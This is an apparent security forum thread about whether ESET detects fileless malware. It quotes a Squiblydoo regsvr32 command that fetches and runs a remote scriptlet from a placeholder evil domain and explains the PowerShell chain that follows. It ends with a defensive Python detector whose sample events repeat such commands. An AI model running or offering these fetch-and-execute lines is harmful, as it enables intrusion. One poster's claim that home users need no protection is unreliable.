
Does Eset block File-less malware?

Wolf Igmc4


Because Eset has memory protection, the answer is yes, but that doesn't mean it can detect all of them.
Home products are weak against fileless malware, and I can say home users are never targeted by fileless malware because it is designed to target businesses, so you don't need protection against fileless malware.
But if you want reliable protection against these attacks, then you need AppGuard.
APPGUARD+ESET would be a good combo :D


16 hours ago, TomFace said:

Shop around....depending on your location, watch for sales (especially seasonal ones).

Believe OP was referring to AppGuard. They just recently "jacked up" their yearly subscription costs considerably. Also you have to agree to auto-renewal of the subscription, i.e., give credit card details. Thanks but no thanks.


  • Administrators
23 hours ago, Wolf Igmc4 said:

That's it, I just don't know if Eset can block it.

Yes, ESET is able to detect fileless malware in the registry. Personally I've come across several cases where REG/something was detected in the registry.


There are a number of characteristics of fileless malware.

One of them is the use of the Win registry for persistence purposes. This will allow the malware to reload itself at boot time.

However, the established definition of fileless malware is one where the initial attack is performed entirely from memory without ever directly downloading anything to the disk. Here is an example of one currently active: https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reports/codefork-malware/ . As with many of these attacks, the initial infection vector is unknown. In this attack, one example is:

A common infection vector most likely was used against most of the targeted organizations. For example, an email attachment with a Microsoft Office document containing a malicious macro. The infection payload launches the following command:

regsvr32 /s /u /i:http://xxx.somerandomevildomain.xx/evilpath.xml scrobj.dll

I won't get into all the details of the attack other than to discuss the abuse of regsvr32 in this attack. This is an over-a-year-old exploit named "Squiblydoo" developed by Casey Smith, a security researcher. For starters, it requires admin privileges to run. This implies an escalation of privileges to run; something that, unfortunately, is quite easy to do on Win OSes. What the above command does is establish a remote connection to the attacker's server. Then wscript.exe is run remotely to execute obfuscated JavaScript code that executes PowerShell, which remotely downloads a PowerShell script and runs it from memory. And "we are off and running" as far as the malware attack goes.

As far as I am aware, Eset's HIPS does not monitor regsvr32 execution. I do, with a user-created HIPS rule. I additionally monitor any inbound/outbound network traffic from it with a user-created Eset firewall rule.

Edited by itman
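As an added example (not code from this thread, from ESET, or from the Radware advisory), the Python script below applies the same idea as the user-created HIPS rule described above to process-creation telemetry: it flags regsvr32 launches whose /i: argument points at a remote URL or that load scrobj.dll, and notes when an Office application is the parent process. The "Key=Value|Key=Value" log format and the four sample events are constructed for this example.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style
# fields, joined with "|"); not real telemetry from any system.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\regsvr32.exe|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|CommandLine=regsvr32 /s /u /i:http://xxx.somerandomevildomain.xx/evilpath.xml scrobj.dll",
    r"Image=C:\Windows\System32\regsvr32.exe|ParentImage=C:\Windows\System32\msiexec.exe|CommandLine=regsvr32 /s C:\Program Files\Vendor\vendor.dll",
    r"Image=C:\Windows\System32\notepad.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=notepad.exe C:\Users\alice\notes.txt",
    r"Image=C:\Windows\SysWOW64\regsvr32.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=REGSVR32.EXE /S /I:https://198.51.100.7/payload.sct SCROBJ.DLL",
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# /i: followed by an http(s) URL means the scriptlet is fetched remotely.
REMOTE_SCRIPTLET = re.compile(r"/i:\s*https?://", re.IGNORECASE)

def parse_event(line):
    """Split one 'Key=Value|Key=Value' event line into a dict."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields

def basename(path):
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the reasons this event looks like regsvr32 scriptlet abuse ([] if none)."""
    reasons = []
    if basename(event.get("Image", "")) != "regsvr32.exe":
        return reasons  # benign local DLL registration also passes through here
    cmd = event.get("CommandLine", "")
    if REMOTE_SCRIPTLET.search(cmd):
        reasons.append("regsvr32 /i: points at a remote URL")
    if "scrobj.dll" in cmd.lower():
        reasons.append("scrobj.dll scriptlet handler loaded")
    if basename(event.get("ParentImage", "")) in OFFICE_PARENTS:
        reasons.append("spawned by an Office application")
    return reasons

def scan(lines):
    """Return (event number, reasons) for every suspicious event in an iterable of lines."""
    hits = []
    for n, line in enumerate(lines, start=1):
        if line.strip():
            reasons = classify(parse_event(line))
            if reasons:
                hits.append((n, reasons))
    return hits

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_EVENTS):
        print(f"event {n}: " + "; ".join(reasons))
```

The same scan works on a real export by passing an open file object instead of SAMPLE_EVENTS; the local-DLL registration in event 2 is left alone, which is what keeps the rule from paging on routine installers.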
